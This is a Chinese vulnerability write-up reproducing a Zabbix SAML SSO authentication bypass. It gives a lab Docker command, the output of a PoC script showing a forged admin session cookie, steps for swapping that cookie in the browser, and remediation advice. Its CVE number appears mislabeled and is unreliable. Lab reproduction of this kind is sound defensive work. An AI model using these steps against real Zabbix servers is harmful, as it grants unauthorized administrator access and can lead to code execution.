漏洞概述

漏洞编号：cve-2025-23131

漏洞威胁等级：高危

Zabbix是一个广泛使用的开源监控平台，专门用于收集、集中和监控整个基础设施中的CPU负载和网络流量等指标。

在启动SAML SSO认证模式的情况下，Zabbix对客户端提交的Cookie会话存在不安全的存储方式，导致恶意用户可以通过构造特殊请求绕过认证，获取管理员权限，从而实现RCE。

受影响的Zabbix Web前端版本包括：

5.4.0-5.4.8和6.0.0alpha1。尽管官方说明受影响的版本在5.4.0-5.4.8范围内，但在zabbix 5.4.11版本中同样可以复现此问题。

代码语言：shell

# 快速构建zabbix环境
]# docker run --rm -d -P lutixiaya/zabbix-cve_2025_23131:latest
]# docker ps
CONTAINER ID   IMAGE                                    COMMAND                  CREATED         STATUS         PORTS                                     NAMES
158e737a3794   lutixiaya/zabbix-cve_2025_23131:latest   "/bin/sh -c 'bash /r…"   3 seconds ago   Up 2 seconds   0.0.0.0:49153->80/tcp, :::49153->80/tcp   competent_diffie

可以看到启用了SAML认证方式，直接点击该认证无法登陆，但通过修改cookie可以绕过认证。

修改cookie：

代码语言：shell

~]# python CVE-2025-23131.py http://ip:49153/
未加密Payload：{"saml_data":{"username_attribute":"Admin"},"sessionid":"99c65fd664e1e0bb929d8a9d964f0a98","sign":"2cd21893210753d4d2926aa08fe7ebefdd41a8ab6413bb551ce048848b1dda44"}
加密后Payload：eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiOTljNjVmZDY2NGUxZTBiYjkyOWQ4YTlkOTY0ZjBhOTgiLCJzaWduIjoiMmNkMjE4OTMyMTA3NTNkNGQyOTI2YWEwOGZlN2ViZWZkZDQxYThhYjY0MTNiYjU1MWNlMDQ4ODQ4YjFkZGE0NCJ9

将上述加密后Payload复制，并修改zbx_session的值（在浏览器按F12，打开开发者工具）。

修改完成后，再次点击SAML，即可直接绕过认证登陆！

修复建议

临时方案：禁用SAML身份验证

推荐方案：升级到安全版本

# python  # docker  # 浏览器  # 工具  # ai  # Cookie  # zabbix  # 是一个  # 但在  # 可以通过  # 可以看到  # 升级到  # 不安全  # 开源  # 基础设施  # 直接点击  # 身份验证 

相关栏目： 【 网站优化151355 】 【 网络推广146373 】 【 网络技术251813 】 【 AI营销90571 】

相关推荐： 轻松掌握MySQL函数中的last_insert_id()  浅析上传头像示例及其注意事项  如何快速搭建个人网站并优化SEO？  Laravel用户认证怎么做_Laravel Breeze脚手架快速实现登录注册功能  如何在IIS中配置站点IP、端口及主机头？  文字头像制作网站推荐软件,醒图能自动配文字吗？  Laravel广播系统如何实现实时通信_Laravel Reverb与WebSockets实战教程  Laravel如何记录日志_Laravel Logging系统配置与自定义日志通道  Laravel如何实现本地化和多语言支持？（i18n教程）  如何生成腾讯云建站专用兑换码？  如何破解联通资金短缺导致的基站建设难题？  Java解压缩zip - 解压缩多个文件或文件夹实例  网站图片在线制作软件,怎么在图片上做链接？  企业网站制作这些问题要关注  如何用VPS主机快速搭建个人网站？  Laravel如何发送邮件和通知_Laravel邮件与通知系统发送步骤  Laravel如何自定义错误页面（404, 500）？（代码示例）  通义万相免费版怎么用_通义万相免费版使用方法详细指南【教程】  Laravel怎么实现前端Toast弹窗提示_Laravel Session闪存数据Flash传递给前端【方法】  html文件怎么打开证书错误_https协议的html打开提示不安全【指南】  图片制作网站免费软件,有没有免费的网站或软件可以将图片批量转为A4大小的pdf？  Laravel如何获取当前用户信息_Laravel Auth门面获取用户ID  制作ppt免费网站有哪些,有哪些比较好的ppt模板下载网站？  大连企业网站制作公司,大连2025企业社保缴费网上缴费流程？  详解Android中Activity的四大启动模式实验简述  如何在橙子建站上传落地页？操作指南详解  Laravel如何与Pusher实现实时通信？（WebSocket示例）  网站制作价目表怎么做,珍爱网婚介费用多少？  Win11怎么关闭资讯和兴趣_Windows11任务栏设置隐藏小组件  Laravel如何设置自定义的日志文件名_Laravel根据日期或用户ID生成动态日志【技巧】  Python3.6正式版新特性预览  Google浏览器为什么这么卡 Google浏览器提速优化设置步骤【方法】  Laravel如何实现多表关联模型定义_Laravel多对多关系及中间表数据存取【方法】  HTML 中如何正确使用模板变量为元素的 name 属性赋值  三星网站视频制作教程下载,三星w23网页如何全屏？  弹幕视频网站制作教程下载,弹幕视频网站是什么意思？  linux top下的 minerd 木马清除方法  实例解析angularjs的filter过滤器  如何在景安云服务器上绑定域名并配置虚拟主机？  制作电商网页,电商供应链怎么做？  Laravel的路由模型绑定怎么用_Laravel Route Model Binding简化控制器逻辑  javascript和jQuery中的AJAX技术详解【包含AJAX各种跨域技术】  如何在 Go 中优雅地映射具有动态字段的 JSON 对象到结构体  ChatGPT 4.0官网入口地址 ChatGPT在线体验官网  Laravel Session怎么存储_Laravel Session驱动配置详解  如何在宝塔面板创建新站点？  ai格式如何转html_将AI设计稿转换为HTML页面流程【页面】  Python进程池调度策略_任务分发说明【指导】  Laravel如何配置和使用队列处理异步任务_Laravel队列驱动与任务分发实例  laravel怎么为应用开启和关闭维护模式_laravel应用维护模式开启与关闭方法